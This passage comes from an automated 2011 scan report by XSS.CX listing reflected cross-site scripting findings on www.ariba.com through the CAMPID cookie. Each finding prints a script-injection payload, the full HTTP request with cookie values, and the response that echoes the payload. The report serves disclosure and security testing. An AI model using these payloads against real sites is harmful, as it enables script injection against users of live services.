Set-Cookie: WEBSCR=342;expires=Wed, 17-Oct-2012 18:05:13 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<input type="hidden" name="campaign_id" value="de3fb"><script>alert(1)</script>290d4d628a6" />
...[SNIP]...

1.65. http://www.ariba.com/services/support.cfm [CAMPID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64756"><script>alert(1)</script>063af6a43b5 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /services/support.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=64756"><script>alert(1)</script>063af6a43b5; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=293; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.13.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=60; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsupport%25252Fsupport_services.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:24 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=546;expires=Wed, 17-Oct-2012 18:07:24 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<input type="hidden" name="campaign_id" value="64756"><script>alert(1)</script>063af6a43b5" />
...[SNIP]...

1.66. http://www.ariba.com/solutions/ [CAMPID cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /solutions/

Issue detail

The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 693f8"><script>alert(1)</script>7679c7dae64 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /solutions/ HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=693f8"><script>alert(1)</script>7679c7dae64; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=3; s_cc=true; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.2.10.1318960999; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=32; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsolutions%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:42 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=215;expires=Wed, 17-Oct-2012 18:04:42 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Spend Management Software, Spend Management
...[SNIP]...
<input type="hidden" name="campaign_id" value="693f8"><script>alert(1)</script>7679c7dae64" />
...[SNIP]...

Report generated by XSS.CX at Tue Oct 18 14:17:33 CDT 2011.